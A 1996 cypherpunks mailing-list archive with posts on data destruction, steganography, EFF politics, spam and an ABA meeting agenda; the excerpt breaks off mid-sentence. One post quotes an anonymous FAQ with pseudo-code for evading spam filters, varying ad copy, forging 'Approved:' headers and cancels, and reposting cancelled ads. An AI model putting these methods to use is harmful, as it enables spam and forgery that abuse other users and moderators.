>The paper starts with the comment that most secure data destruction guides
>are classified.  There is the suspicion that the unclassified ones do not
>cover the newer recording materials and techniques, and will not protect
>you against government attackers.

I disagree.  The methods for declassification in the Army and
Defense Department security manuals included several approaches:
1) Physical destruction - acid, sandblasters, etc.
2) NSA-Approved Whopping Big Magnets
3) NSA-Approved Hopefully-Bugfree computer programs for some computers.

The most secure methods were the unclassified ones - after we
sandblasted our RM05 disk packs, the NSA and KGB can't read anything.
The less secure methods are the ones that require NSA approval -
how strong  is a Whopping Big Magnet this year?  (Too strong to put 
near MY computer lab, thank you! :-)  The answer tells you something
about what the NSA can crack, which they not only don't want known,
they don't want to encourage the KGB to erase their own disks better
or to use the knowledge to become better at reading stolen Yankee disks.
And NSA-Approved computer programs presumably have weaknesses and bugs,
like all computer programs; they carry the risk that Reverse Engineers
can figure out how to find the data the NSA missed.

But shredding the floppy?  No need to classify that, no secrets leaked
by saying "Yeah, if you dissolve the magnetic film in acid we can't
read anything on the etch marks in the mylar."  
It's Dumb and Safe (as long as you do the paperwork to make sure
that you know which magtapes were fed to the shredder, which ones
were overwritten with other RILLY SEKRET DATA, and which ones were
stolen by the Tape Drive Repair Truck driver.)


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 14 Sep 1996 19:17:00 +0800
To: cypherpunks@toad.com
Subject: Re: really undetectable crypto
Message-ID: <199609140915.CAA28230@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:26 PM 9/12/96 -0700, Jim_Miller@bilbo.suite.com wrote:
>Most everybody on the list is familiar with the technique of hiding  
>encrypted messages in the LSBs of image files.  Personally, I would not  
>use such a technique because don't I believe it's really undetectable.  
>I assume, without proof, that the LSBs of images files have statistical  
>properties that are sufficiently different from encrypted data that a  
>clever person could determine whether or not an image file contained an  
>imbedded encrypted message.

First of all, they should at most be able to tell that there are
random-looking-noise bits in there - if they start seeing patterns of
------BEGIN PGP ENCRYPTED SECRET MESSAGE------
you haven't done your job, though there are more subtle patterns
that are more annoying to hide, like the slight bias of an RSA-encrypted
piece of data; Hal Finney and others have written about this in the past.

Hiding Depends substantially on the image source and the compression
methods, if any, used on the image.  For instance, a 24-bit true-color 
image or 8-bit grey-scale image from a scanner with 6-bit resolution
will be pretty noisy in the LSBs, and if the Bad Guys are clever enough
to find the patterns in them, you can be clever enough to find them
and encode your initially-pseudorandom cyphertext stegobits in a way
that matches the stats of the noise.  On the other hand, if you
take the LSBs of cartoon data, with large areas of solid colors,
and start dithering them with stegobits, it's obvious you're up to 
something, if not necessarily what it is - be careful.

Ron Rivest posted a message on coderpunks mentioning somebody's
suggestion of building an internet-phone sort of program that
shoves stegobits into the voice compression.  I'd be extremely surprised
if you could do that with the fancier compression algorithms,
such as CELP, LPC, and friends, but it shouldn't be too hard with the
looser compression algorithms such as ADPCM and Delta-Modulation,
which need 16-32kbps and can run on really dumb processors -
you've got more bits per second to hide in, can get away with 
stealing more of them, and there isn't any real subtle prediction stuff
going on that you've got to work around.  Given that most of the
popular Internet Phone products don't do encryption (sigh...),
this would at least be a good cover.  (Well, assuming you've got a
credible voice conversation going and aren't saying things like
"OK, Carlos, let me send you the secret message starting ... NOW".)




[tricks #1,2 - picking your cleartext so the RC4/40 cyphertext or MD5s
have chunks of the real stego-cyphertext you want - cute.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 15 Sep 1996 13:21:05 +0800
To: cypherpunks@toad.com
Subject: Why organizations turn statist.
Message-ID: <199609150312.UAA02749@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:44 AM 9/11/96 -0700, Timothy C. May wrote:
> A wonderful idea, Stephan! You might try contacting 
> EFF to see if a German branch exists 


The EFF is ultimately a business lobby group, because it gets
most of its funding from businesses.  It is therefore potentially
subject to the same corruption as other business lobbies.

Business lobby groups are intermediaries, and therefore serve
two masters, both the politicians and the businessmen, not one
master.  Frequently they serve the interests of the politicians
at the expense of their donors, at the expense of the goals
that the lobby group is supposed to pursue.

Suppose for example you have a lobby group that
represents the widget industry.

On the one hand, the CEO of General Widgets might ring them up 
and say: "We are being trashed by these great japanese widgets, 
and unless something is done about it we might have to reduce 
prices or improve quality", and the lobby organization has a 
little chat with some tame politicians about the terrible 
suffering the Japanese are inflicting on American workers.   
That is the way lobby groups are supposed to work, but seldom do.

On the other hand sometimes the politician (or a
gofer on his staff), rings the lobby and says:  "I need a
million dollars fast:  What potential political action gets the
chairman of General Widgets waking up in a cold sweat in the
middle of the night?  What could destroy the widget industry, 
and yet be politically feasible?"  Shortly thereafter the 
lobbyist has a little chat with chairman of General Widgets 
about forthcoming legislation.  The lobby group
gets a big bag of money, some of which it passes on to
the politician, and the threatened legislation evaporates 
until the next election.

To be a successful lobby group, the EFF needs to get its
fingerprints on legislation, so that it can make threats and
promises to businessmen in the computer industry.

Thus the EFF's best interests as an organization are contrary
to our desires and contrary to the announced aims of the 
organization.  Legislation, any legislation, is in their 
interests and legislation, any legislation is against our 
interests.

Our interests, and the EFF's interest are opposed with no
apparent mutual good possible.

Now it is possible that the EFF is virtuously pursuing its
supposed goals, rather than its practical interests.  We should
consider the available evidence in order to infer what it is
in fact up to.

According to Dave Barry the word "politics" derives
from the Greek "poly" meaning many, and "ticks"
meaning small disgusting bloodsucking parasites.

In order to be well funded, the EFF needs government
regulation of the net.  The kind of regulation that would be
most effective in ensuring large donations would be regulation
that compels internet businessmen to lobby the government.
for example regulations that make impossible, inconsistent, and
contradictory requirements on those who provide software,
hardware, and services, for example a demand that big
companies police the net in ways that even governments would
find extremely difficult, such as the British child porn
crackdown, or legislation which if properly crafted would 
have the effect of giving some businessmen a monopoly of 
some aspect of the net, and putting other businessmen out 
of business,  for example legislation that requires case 
by case approval of software, or legislation that compels
the businessman to invade his customers privacy, and also
prohibits him from invading that privacy unless he has a
waiver issued by the state.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 15 Sep 1996 13:22:07 +0800
To: cypherpunks@toad.com
Subject: Re: Jury Nullification = Voting One's Conscience
Message-ID: <199609150324.UAA03466@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:24 PM 9/11/96 -0700, Timothy C. May wrote:
> And I don't think there has _ever_ been a case of a juror prosecuted/jailed
> for voting his or her conscience, regardless of jury instructions.

Where have you been for the last twenty years?

In fact a juror was recently jailed for this.  She had informed the other
juries of the likely severity of the punishment for pot, and refused 
to vote for conviction.

She was charged with perjury and various contrived and bogus charges.

The basis of perjury charge was that she had sworn there was no reason 
she could not do justice, and, according to the court, she was not
doing justice because of her opposition to the drug laws..
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 15 Sep 1996 01:07:11 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <Pine.BSF.3.91.960913225312.7410B-100000@mcfeely.bsfs.org>
Message-ID: <cuX9TD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> <Dr.D.V.KOTH Standard T.C.May reference deleted>
(fart) H??? Kook of the Hour?

> Nice concept, but it isn't that hard to slightly alter each message; now
> you've also got to determine which are "the same" messages,and which are
> not. Why would the headers be easier to vary than the body? Tack a few
> extra one-liner pieces of add copy on the end in pseudo-random order, and
> you've got "different" messages.

Consider the spam currently found on Usenet. Most multi-posters repeat
exactly the same text, and post it alphabetically once in each newsgroup.
That's what Cantor&Siegal did originally, and that's what they recommended
in their book (which by the way I highly recommend). I remember a couple
of incidents before C&S when someone forged an article from "B1FF" in
every newsgroup, and someone posted a warning about the second cumming of
Christ in every newsgroup, and they were mildly annoying, but didn't break
anything. During the C&S incident the traffic problems (Australia kicked
off the net et al) were caused not by the C&S spam itself, but by the
multitude of ineptly forged cancels. But I'm digressing...

In every e-mail spam I've seen so far, the bodies of all the e-mails
in the single spam are identical. To combat it, a trusted party could
simply post the body, and the readers who trust him would discard
incoming e-mails that match the body. I'm certain, however, that the
spamming technology will improve. I attach at the end an interesting
article that appeared anonymously about a year ago, explaining how
one can multi-post essentially the same message while varying the text.

> How do you view this specially designed newsgroup as working? Will you
> need to fetch all notices on a regular basis, and use the "warnings" to
> sort your mail? Seems like it would take longer to alter your trust level
> of third parties than it would take for your "opponent" to crank up
> another aol trial disk ...

The way I envision this system (and I don't think we really need this yet)
is: a trusted party (there may be more than one of them) posts templates
saying something like: 'don't compare after \n--' (randomized signature);
'contains the string CHAG ratings in the body 3 times'; 'contains the string
Received: from interramp.com in the headers once'. A reader who wants to
update his database of e-mail that needs to be junked would run a program
that would
1) get new articles in the filter notices newsgroup
2) look for articles digitally signed by the "raters" trusted by this reader
3) add their templates to this reader's mail filtering rules
Then when the reader filters his incoming e-mail, he won't see the junk
e-mail that matches the rules.
Of course if the rater posts templates that are "too general" and rejects
non-junk e-mail, the readers won't trust his notices anymore.

If the junk mail makes it through to a reader becase the template for it
hasn't yet been posted, the reader can forward it to the rater and ask him
to post a template for it for other readers' benefit.

Here's the old anonymous article on how to spam better:

]Subject: FAQ for Usenet Advertisers: Use Mathematical Algorithm to Avoid "Spam"
]
]Q-0. Introduction
]
]This mathematical advice is posted as an academic research study and is not a
]solicitation to act. It is a technical note and contains numerous mathematical
]algorithms and portions of pseudo-code. If you are not familiar with the
]intricacies of RFC 1036, you can ask a friendly techie to help implement these
]algorithms in a computer programming language, such as PERL. For example, the
]headers of your ad should contain the header "Approved: <your name>" to assure
]proper propagation in the so-called "moderated" newsgroups, but the techniques
]for inserting it are outside the scope of this article.
]
]Certain self-appointed "net-judges" keep trying to suppress the public
]dissemination of knowledge on how Usenet works (available from RFC 1036 and
]other publicly accessible documents). They rely on "security through obscurity"
]to protect their economic interests and harass honest Usenet entrepreneurs so
]as to keep the advertising pie all to themselves. Hence the need for anonymity.
]
]Q-1. Can I post a separate copy of my ad into each target newsgroup in
]the alphabetical order?
]
]No! That would be "spamming".
]
]Spamming is commonly defined as excessive posting of multiple, separate copies
]of identical messages to many newsgroups, one right after the other, without
]using the standard method of cross-posting, described in this article. Since
]it's really not that difficult to write a program that will post the same
]advertisement to dozens, if not hundreds of thousands of newsgroups, a lot of
]people have taken to doing this. People usually spam as a means of flooding
]Usenet with messages about a product or service that they want to sell,
]although they can spam for other reasons. Spamming Usenet is a BAD THING to do.
]DON'T DO IT. Follow the instructions in this article to advertise WITHOUT spam.
]
]Consider the old-fashioned way of spamming Usenet with ads. Let G be the list
]of all the relevant newsgroups where you want to post your ad. Let NG be the
]number of such newsgroups. We will refer to individual newsgroups as G[0]
]through G[NG-1].
]
]Remember once and for all: it's a very bad idea to run the equivalent of:
]
]for i=0 to NG-1 step 1 do                                          (1)
] post ad to G[i];
]
]This is SPAM. You can do better than that. But what happens if you just spam?
]
]First, some self-appointed net.cops, "vigilantes", or "net judges" will get
]upset if you post into every newsgroup in alphabetical order. Naturally, you
]couldn't care less if you hurt their feelings, but some of these vigilantes
]might go as far as impersonate you and "forge" a control article, making it
]look like you yourself are asking every computer on the network to delete your
]ad! This is illegal, but happens all too often.
]
]It is a major waste of Usenet resources to post your ad to one newsgroup at a
]time, without cross-posting. Please don't do it. On the other hand, if your
]"Newsgroups:" header is too long, it may break some Usenet newsreaders. Let NC
]be the number of newsgroups you will cross-post to at one time. Make sure your
]NC is never greater than 20, or else the self-appointed net.cops or "judges"
]will call your ad "velveeta" (spread into too many newsgroups) and forge
]cancels for it. In the pseudo-code below NC actually varies between 8 and 12.
]Section Q-2 explains what to do when NG is greater than NC.
]
]Second, some of the newsgroups on your list may have poor propagation. When you
]post your ad to them, they won't reach every other site on Usenet unless you
]cross-post the same ad to better propagated groups. After you've composed the
]list of newsgroups into which you want to post your announcement, separate them
]into two lists: the well-propagated newsgroups known at every site (like
]"sci.important.announce") and the poorly propagated ones (like "ca.spam.misc").
]Let NW be the number of well-propagated groups. Let NP be the number of poorly
]propagated groups. You'll probably have them listed in alphabetical order, but
]we'll see how to fix that. Let R be the integer part of NP/NW. You will cross-
]post to one newsgroup from the P list for every R newsgroups from the W list.
]
]Now you are going to go through the lists W and P and make sure that you cover
]each newsgroup. If you pick newsgroups from G at random, you will definitely
]miss a few and hit a few more than once. That would be a waste of Usenet
]resources, which you want to avoid. Instead, let SW be a random number
]relatively prime to NW. Recal Euclid's algorithm for computing the greatest
]common divisor of two integers m, n, such that n>m:
]
]do {
] g=m;
] m=n%m;
] n=g;
] } while (m);
]
]We now rewrite loop (1) as:
]
]i=SW;                                                                  (2)
]do {
] post ad to G[i];
] i=(i+SW) % NW;  /* where % denotes the remainder */
] } while (i!=SW);
]
]Note: the remainder is denoted "mod" in some computer programming languages.
]
]It is easy to see that this loop will cover every newsgroup in G exactly once,
]but not in any kind of alphabetical order. However you still want to cross-post
]your ad to both the W list and the P list. Here is the complete pseudo-code:
]
]/* choose the step for loop (2) */
]let SW=NW/3+random(NW/3)    /* random number betweem NW/3 and 2*NW/3 */
]while (GCD(SW,NW)<>1) ++SW; /* relatively prime to NW */
]
]let SP=NP/3+random(NP/3) /* likewise, random number betweem NP/3 and 2*NP/3 */
]while (GCD(SP,NP)<>1) ++SP;
]
]done=false;
]NR=0; /* when it reaches R, we take a newsgroup from the P list */
]i=j=0; /* control variables for the loops on W and P */
]do {
] L="";  /* random number of groups to cross-post to */
] for (NC=8+random(5); NC>0; --NC) {
]  if (NR<R) { /* choose a newsgroup from the W list */
]   L=L . W[i]; /* here . denotes concatenation, || in some languages */
]   i=(i+SW) % NW;
]   if (i==0) {
]    done=true; /* covered all of W */
]    NC=0; /* break from the for NC loop */
]    }
]   NR++;
]   }
]  else { /* choose a newsgroup from the P list */
]   L=L . P[j];
]   j=(j+SP) % NP;
]   NR=0; /* reset */
]   }
]  }
] post ad to L; /* the list of newsgroups */
] } while (!done);
]
]Q-n Why do some people object to posting multiple copies of the same ad?
]
]Because they're stupid. They don't object when one of them posts 100 inane
]one-liners with the same 20-line .sig art.
]
]
]However to keep the censors from forging cancels for your ads,
]Do not post the same body (ad copy) multiple times! Vary it every time.
]
]Go through your ad copy with a thesaurus and find all the little phrases that
]could be changed slightly without altering the meaning of the ad. For example,
]consider this famous passage:
]
] "We can make it easy to apply and increase your chance of winning one  (3)
] of the 55,000 Green Cards available in the 1994 Green Card Lottery."
]
]One could also rephrase (3) as:
]
] "We can help you apply and improve your chances of winning one
]          (A)                (B)
] of the 55,000 Green Cards distributed through 1994 Green Card Lottery."
]                                (C)
]or even as:
]
] "We can assist you in applying...
]
]We have immediately come up with 3 choices for the first variable phrase, 2
]choices for the second variable phrase, and 2 choices for the third variable
]phrase. Altogether there are 3x2x2=12 ways to combine these phrases to form ad
]copy equivalent to (3).
]
]Using the notation from Q-1, make sure that the number of differently phrased
]ads exceeds NG/NC. That's not as hard as it may sound! For example, if you have
]4 phrases with 2 variants each, 2 phrases with 3 variants, and 1 phrase with 7
]variants, you have a total of 2x2x2x2*3*7=1008 ways of phrasing your ad copy.
]
]The following pesudo-code, when invoked inside a loop, will list all possible
]ways to phrase your ad copy:
]
]SA=SB=SC=0; /* initialize the choice counters */
]do NG/NC times {
] printf("We can ");  /* could be array lookup: */
] printf( (SA==0) ? "make it easy to apply "
] : ((SA==1) ? "help you apply " : "assist you in applying "));
] printf(" and ");
]  printf( (SB==0) ? "increase " : "improve " );
] printf(" your chances of winning one of the 55,000 Green Cards ");
]  printf( (SC==0) ? "available in " : "distributed through " );
] printf("1994 Green Card Lottery.");
] /* advance the counters with carry */
] ++SA;
] if (SA==3) /* number of A choices */
]  {
]  SA=0;
]  ++SB;
]  if (SB==2) /* number of B choices */
]   {
]   SB=0;
]   ++SC;
]   if (SC==2) /* number of C choices */
]    {
]    SC=0; /* wrap around to all zero counters */
]    }
]   }
]  }
]/* pipe the output of printf through a formatter and append a
]  pre-formatted trailer before posting */
] }
]
]As usual, you are strongly encouraged to keep all variant phrasings hype-free.
]What often works very well is to post varying factual information about your
]services or products and include a constant pre-formatted contact address,
]World Wide Web site, or phone number for readers to ask for more information.
]You may wish to use the same technique to vary the "Subject:" headers of your
]ad slightly. You may even have to vary your "From:" and "Organization:" headers
]in your ads to bypass the self-appointed net.censors.
]
]If you have a product or service to advertise, but lack the technical expertise
]to implement these instructions, seek a knowledgeable consultant. Don't ask
]this poster for help. This advice is disseminated as free public service only.
]
]Finally, note that "Spam" and "Velveeta" are someone's registered trademarks
](ab)used unlawfully and without permission by the self-appointed "net judges".
]
]
]The "Subject:" of your message is one of the most important parts. Make
]it catchy. Remember, most modern newsreaders display a menu of article
]subjects and allow the user to select what articles they want to read.
]To be a good net.citizen, consider following the Usenet convention of
]starting the "Subject:" header of your post with the word "AD:". This
]will allow persons to filter them out, if they do not wish to see them,
]and so they'll have no basis no complain about your "unwanted ads".
]
]Add your phone number and other contact information to each Subject
]line. Never announce toll-free 800 on Usenet! You might get a lot of
]crank calls.
]
]The following example illustrates a little programming trick that will make
]your ad look more "catchy", and cause more people to read it. Suppose that your
]program is about to cross-post your ad into fictional newsgroups comp.os.cpm
]and alt.cpu.z80. Let your posting program pull a random article header from one
]of these newsgroups and its Subject: turns out to be "Re: Cross-jump
]optimization". Append it to your ad's subject to make it look like a follow-up.
]For example, if the fixed part of subject is:
]
]"Call 1-800-555-1212 for directory info"
]
]Then the ad cross-posted into these two newsgroups might have the subject:
]
]"Call 1-800-555-1212 for directory info (Was: Re: Cross-jump optimization"
]
]Q: What other neat headers are used in Usenet articles?
]
]Be a good net.citizen: include the "Followup-to: poster" in all your ads.
]If you post your ad to a newsgroup you don't normally read, you don't
]want its readers to ask for more information by posting the followup
]in that newsgroup.
]
]The "Expires:" header tells the other sites until what date to retain your
]ad. For example, if you're advertising a special price on a product or
]service and the offer lasts until December 31, 1999, you should add:
]
]Expires: 31 Dec 1999 01:00:00 GMT
]
]to your ad's header. Make sure the date complies with RFC 822.
]
]The "Approved:" header improves propagation in the so called "moderated"
]newsgroups. It doesn't hurt when posting to "unmoderated" newsgroups.
]Make sure your every ad contains the header:
]
]Approved: your name and e-mail address
]
]Other useful headers, such as "Distribution:" are described in RFC 1036.
]
]
]Q: What can I do if someone "flames" me or badmouthes the product I sell?
]
]It's a fairly common practice on Usenet to forge cancels for other people's
]articles whenever you disagree with their contents. Others are likely to forge
]cancels for your ads, so there's no reason why you can't forge cancels for
]their "flames".
]
]Automatic robocanceller: monitor specified newsgroups for specified
]patterns and forge cancels as soon as a matching patterns appears.
]
]Q: What can I do if someone forges cancels for my ads?
]
]for each message-id M post _twice_:
]into L with message-id M
]into "control".L with message-id "cancel.M"
]
](the so-called "$alz convention" used by the net.cop forgers)
]
]All M's must be distinct. It adds a nice touch to include the name of the
]product or service you're advertising in each M. Instead of boring
]<123456@your.site> say something like <123buy-my-widgets@your.site>.
]Make sure all message-ids are distinct and "legal".
]
]Ability to revive articles for which someone else has forged a cancel.
]
]Suppose you have posted article A1..An with message-id's M1..Mn.
]Save this information in a database. On a fast computer you could use
]PERL's associate list, with
]Mi's used as an index and Ai's being the info you've fed to NNTP, including
]article'b body and the relevant headers, like the list of newsgroups it was
]posted to.
]
]Now have a program monitor your control newsgroup and whenever it sees
]an incoming article with a "Control: M" header, check if M is equal to some Mi
]in your associate list. If it is, then:
]
] * Generate a new message-id, M'i.
]
] * Repost Ai with message-id M'i, adding the header "Supersedes: Mi"
]
] * Replace M' by M'i in your associate list.
]
]As an added touch, you can automatically add a little blurb to the reposted
]article providing header information about the forged cancel to which you're
]reacting.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 15 Sep 1996 00:33:41 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <199609140644.XAA13526@netcom10.netcom.com>
Message-ID: <ksZ9TD35w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:
> A given key could mean "I am Mike Duvos", "I am Tim May", or "I

Fart.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 15 Sep 1996 00:11:51 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <Pine.BSF.3.91.960913223151.7410A-100000@mcfeely.bsfs.org>
Message-ID: <a6Z9TD36w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> Well, it would seem some are helping to make my point; M.Duvos is calling
> for government intervention, in the form of an "Internet Driver's License."

It does not have to be the gubment. It could be a web of trust - like
protocol. E.g. M.Duvos gives a pile of non-reusable, revokable cookies
to people from whom he wants to receive e-mail. Every time one of them
sends him an e-mail, he uses up one of his cookies. If he doesn't give
me any cookies, and I want to e-mail him, I have to negotiate with
someone who has a cookie and get one.

Not sure how this would work with mailing lists...

> There goes anonimity, which has, in general, been a "good thing" on the
> 'net. Here comes "big brother", to protect us from the evil anonymous
> spammer. Here comes more government infrastructure to enforce the LAWS
> that "we", as a society, have subjected ourselves to, so that "the few,
> the rude, the clueless" can no longer send out their anonymously sourced
> spam. Less freedom, more taxes. Why? Because someone out there is doing
> something because they "have the right", by the sole virtue of there
> currently being no law specifically against their particular behavior.

Folks who "fight spam" by forging cancels for any Usenet articles they
don't like are no better than an opressive government. The infrastructure
they've created for efficiently suppressing any information they don't
want to be on Usenet can now be used by any government that wants to
remove objectionable material from Usenet.

> Still on the side of the spammer, Mr. May?
The old fart is a spammer.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Admin <admin@superhot.com>
Date: Sun, 15 Sep 1996 04:03:56 +0800
To: Lance Cottrell <loki@infonex.com>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Art]
Message-ID: <199609141737.LAA05928@rintintin.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 PM 9/13/96 -0700, you wrote:
>>>At 21:50 9/11/96, Ross Wright <rwright@adnetsol.com> wrote to
>>>cypherpunks@toad.com and remailer-operators@c2.org:
>>>>As I said having a website invites comments.  It's like being a
>>>>public figure.  In effect you are publishing your e-mail address.
>>>
>>>
>>>Interesting perspective.  However, placing an email address on a web page
>>>is by no means an offer to take "comments" (i.e., marketing spams) on
>>>anything that strikes the spammer's fancy.
>>
>>How would you know what the *intent* of these other people is in placing
>>mailme: tags on their public pages unless you have been to the specific
>>pages. You speak only for yourself, yet you try to imply that you speak for
>>everyone on the www who has placed a mailto: tag on their pages.
>>
>
>I think this is exactly the point. On a given page I might have several
>mailto tags. One for comments on some subject, one for feedback, and one
>for the webmaster. I expect the person mailing me to take the time to use
>the correct mailbox. I created a page urging political activism, and
>included a mailto for all the relevant Senators and Representatives. I
>hardly think they are interested in this kind of spam.

Of course, that would be for THEM to decide what they find interesting or
not. Every response to this thread always seems to impart some speculation
as to what other people might or might not find interesting. What one finds
of interest another may not so why don't we leave it up to the recipients
themselves instead of some self appointed censors. I'll decide whats
interesting to me, you decide what is interesting to you, and the senators
can decide whats interesting to them.

I'm sure that some senators/reps on the various endowment for the arts
committees, and or the technology oversight committees would have found
HipCrime's sight to be of some interest. Of course if it was a blurb of some
new mixmaster/remailer development, you would have found it of interest, so
lets stop trying to guess what other people want and speak for ourselves.

>
>Trawling the web for every address you can find, then mailing them all
>seems very inappropriate.

To you it may not seem appropriate, as its a subjective judgement, I'm sure
that some brown-shirted jack-booted gov't officials beleive that using a
remailer for any reason is inappropriate....thats what's great about this
world, we all have our own subjective beliefs.

admin


>
>	-Lance
>
>----------------------------------------------------------
>Lance Cottrell   loki@obscura.com
>PGP 2.6 key available by finger or server.
>Mixmaster, the next generation remailer, is now available!
>http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com
>
>"Love is a snowmobile racing across the tundra.  Suddenly
>it flips over, pinning you underneath.  At night the ice
>weasels come."
>                        --Nietzsche
>----------------------------------------------------------
>
>
>
<>________________Lowest_Priced_Long_Distance__________________<>
||Long Distance 9.9¢/min           |Helping hardworking people ||
||9.9¢ Anytime, Anywhere in US!    |like yourself pay the      ||
||Free sign-up, 6 second billing   |lowest possible price for  ||
||http://www.superhot.com/phone    |high quality LD service.   ||
<>-----------------------1_303_692_5190------------------------<>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 15 Sep 1996 02:21:44 +0800
To: cypherpunks@toad.com
Subject: ISC Meeting Agenda
Message-ID: <v03007809ae608192f8a0@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Sat, 14 Sep 1996 08:53:40 -0400 (EDT)
From: Michael S Baum <baum@world.std.com>
To: www-buyinfo@allegra.att.com
Subject: ISC Meeting Agenda
Mime-Version: 1.0



==========================================================
                       MEETING NOTICE
==========================================================

                       Please correspond with:
                                Michael S. Baum, Esq.
                                33 Tremont Street
                                Cambridge, MA  02139-1227  USA
                                V: +1 617.661.1234
                                F: +1 617.661.0716
                                E: michael@verisign.com

Subject:     INFORMATION SECURITY COMMITTEE MEETING NOTICE


Dear Committee Member:

You are cordially invited to participate in a meeting of the Information
Security Committee, Section of Science & Technology, American Bar
Association, on Friday/Saturday, October 18-19, 1996, in Boston.  The
Committee will advance its development of commercial key escrow guidelines
as well as consider digital signature legislative initiatives in the
several States and other jurisdictions, and continue its consideration of
digital signature evidence and liability.

Consistent with Section policy, ISC meeting participants MUST be members
of both the ABA and the ABA Section of Science and Technology.  Please
contact Ann Kowalsky, Manager Section of Science & Technology, at ABA
offices in Chicago by phone: +1 312.988.5599, fax: +1 312.988.5628, or
email: sciencetech@attmail.com for membership information. It is possible
to become a paid member of the ABA and the ISC at the meeting.

Dan Greenwood, ISC member, has kindly agreed to host the meeting at the
Information Technology Division of the Commonwealth of Massachusetts.  Dan
can be reached at 617.973.0071 or DGreenwood@state.ma.us for directions &
logistical information.

Meeting details appear below. I look forward to seeing you in Boston.


Sincerely,


Michael S. Baum
Chair, Information Security Committee
Section of Science & Technology, ABA



                        ---------------

                  INFORMATION SECURITY COMMITTEE
                         October 18-19, 1996

                          Tentative Agenda
                 (see "Meeting Details," next page)
        (In extended sessions, breaks will be taken as needed.)

October 18, 1996  Friday

 8:30-9:00   Greetings, breakfast, administrative matters.
 9:00-9:30   Introductions, meeting logistics, Guidelines update,
              questions; PKI-relevant standards reports.
 9:30-12:00  Legislative/Regulatory Update (including open conference call
              with digital signature leg./reg. drafting committee
              representatives in the US and abroad).
12:00-13:00  Joint lunch with Boston Bar Assn, Computer Law Committee.
13:00-18:00  Continuation of legislative/regulatory update with digital
              signature leg./reg. drafting committee representatives.
18:00-????   Watering hole discussions; possible continuation of work
              group meetings.


October 19, 1996  Saturday

 8:30-9:00   Breakfast, et cetera.
 9:00-10:00  Presentation by Key Escrow work group.
10:00-12:00  Breakout sessions on work groups.
12:00-13:00  Working lunch and guest presentation on "Assuring Quality and
              the Accreditation of Certification Authorities" by
              invited representative of the Nat'l Inst. of Standards and Tech.
13:00-15:00  Presentations by Work Groups.
15:00-15:30  Path Forward; wrap-up.




                             ISC MEETING DETAILS
                              October 18-19, 1996

Members are urged to participate in one of the work groups that will be
presenting/meeting during the ISC's meeting.

    "Addendum" Work Group
     Contact: Ruven Schwartz (rschwart@research.westlaw.com)
              Tom Smedinghoff (tsmed@mbc.com)
              Joe Wackerman (jwackerm@email.usps.gov)
       The Addendum Work Group will continue drafting a digital signature
       trading partner agreement -- integrating the principles of the
       Digital Signature Guidelines, and developing additional practical
       commentary for this model form of electronic commerce agreement.

    Evidentiary Work Group
    Contact: Stan Kurzban (qbjw99a@prodigy.com) or
             Serge Parisien (parisise@droit.umontreal.ca)
       The Evidentiary Work Group will complete and present
       a provisional outline for a tutorial on the evidentiary
       implications of digitally signed information and advance drafting
       of material for each section of the tutorial.

    Key Escrow Work Group (KEWG)
    Contact: Dwight Olson (73522.3542@compuserve.com) or
             Randy Sabett (rsabett@venable.com)
       The KEWG will focus on the legal and technical aspects
       of commercial key escrow.  The group will seek to accurately
